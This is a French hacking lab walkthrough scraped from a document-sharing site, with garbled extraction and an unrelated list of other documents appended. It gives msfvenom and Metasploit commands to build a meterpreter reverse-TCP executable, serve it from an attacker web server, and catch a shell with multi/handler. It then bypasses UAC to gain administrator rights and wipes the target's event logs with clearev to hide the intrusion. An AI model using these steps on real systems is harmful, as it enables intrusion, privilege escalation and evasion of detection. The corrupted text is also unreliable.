Obtenir les privileges d x27 administrateur systeme et supprimer toutes les traces de piratage

Obtenir les privilèges d'administrateur système et supprimer toutes les traces de piratage Ce TP se déroulera en cinq phases Etape Création du Payload Etape Placement du Payload dans le dossier www pour faciliter le partage avec la cible Etape Téléchargement et exécution du Payload sur la machine cible via l ? ip de la machine Kali Etape Lancement de notre serveur d ? écoute avec MSFCONSOLE Etape E ?acer nos traces Document produit par Saliou Thiobane NB Nous allons ici jeter un coup d ? ?il sur le contenu du ?chier log de notre machine cible avant de mener l ? attaque CImage - logs de la machine cible avant l ? attaque Etape Création du Payload Msfvenom -a x - - platfom windows -p windows meterprter reverse tcp lhost ip de la machine kali ? lport -f exe -o NomDuFichier exe Etape Placement du Payload dans le dossier www pour facilité le partage avec la cible CEnsuite démarrer le serveur apache pour que notre dossier de partage serveur web soit accessible à distance via l ? ip de la machine Kali Etape Téléchargement et exécution du Payload sur la machine cible via l ? ip de la machine Kali Sur le navigateur de la cible saisir l ? ip de Kali X nomdu ?chier exe Etape Lancement de notre serveur d ? écoute avec MSFCONSOLE use exploit multi handler set payload windows meterpreter reverse tcp set lhots ip de la machine kali ? set lport exploit Une fois que la cible exécute notre payload nous obtenons un meterpreter Bingooo Après avoir obtenu l ? accès nous devons e ?acer par la suite nos traces pour ne pas être repérer Allons-y Sur le meterpreter nous allons taper la commande clearev qui va nettoyer les logs de la machine cible CIci le souci si l ? on exécute cette commande naturellement le système nous bloque car nous ne disposons pas les droits nécessaires pour faire cette action car nous somme connecter en tant utilisateur simple hors pour faire cette action nous devons avoir plus de privilèges se connecter en tant que admin system ? A ce niveau nous allons mettre notre session en arrière-plan pour la récupérer plus tard avec la commande background ? puis on fait un search uac User Account Control Choisir l ? option et renseigner les options avec la commande Set Payload Set Lhost Set Lport Set session la session qui a été mise en arrière-plan exploit CUne fois l ? exploit réussi ou constatons avoir les droits requis pour bypasser les UAC User Account Control RMQ sur l ? image ci-haut nous voyons clairement que l ? on possède les droits d ? administrateur sur le système de la cible Etape Suppression des logs de la cible Voilà avec la commande clearev nous avons pu e ?acer nos traces C

Documents similaires
Genie chimique 1 Programme Pédagogique National du DUT Génie chimique ?? Génie des procédés ? Présentation de la formation ? Ministère de l'éducation nationale de l'enseignement supérieur et de la recherche SEPTEMBRE C SOMMAIRE LA FORMATION - LA SPECIALIT 0 0
La technique du resume LA TECHNIQUE DU RÉSUMÉ Résumer un texte c'est réduire un énoncé selon un certain nombre de mots imposé en en restituant l'essentiel des idées et la structure Cet exercice requiert deux qualités principales la rigueur de la pensée et 0 0
Cours LES CANALISATIONS ELECTRIQUES SCIENCES ET TECHNIQUE INDUSTRIELLES : 1GE L 0 0
Centrale laitiere 1 Le MIX MARKETING de la CENTRALE LAITIERE Travail réalisé par Hamid SAOUA Zineb El IDRISSI AL BOUZAIDI Imane ADDNAN Nabil BENNANI Encadré par Mr Hatim CPlan I Présentation de la Centrale Laitière Centrale Laitière en bref Les étapes mar 0 0
Demarrage direct moteur 1 sens de rotation repere elec 1 0 0
Chapitre II/- Les amortissements. Exemple n° 1 : L’entreprise « ACHRAF » a acqu 0 0
Les techniques de nettoyage des machines 0 0
Rp cycle 1 d1 langage REPÈRES DE PROGRESSIVITÉ CYCLE Domaine d ? apprentissage MOBILISER LE LANGAGE DANS TOUTES SES DIMENSIONS Composante du domaine d ? apprentissage L ? ORAL DOMAINES DU SOCLE CONCERNES D Les langages pour penser et communiquer ? D Les m 0 0
PREMIERE PARTIE : LA GESTION INDUSTRIELLE BENLAMARA HOCINE CHAPITRE I : INTRODU 0 0
These version finale UNIVERSITE DE PARIS I PANTHEON-SORBONNE SCIENCES ECONOMIQUES - SCIENCES HUMAINES - SCIENCES JURIDIQUES ET POLITIQUES PARTENARIATS PUBLIC-PRIVE ET PERFORMANCES Théories et applications au secteur de l ? approvisionnement d ? eau potabl 0 0
  • 46
  • 0
  • 0
Afficher les détails des licences
Licence et utilisation
Gratuit pour un usage personnel Aucune attribution requise
Partager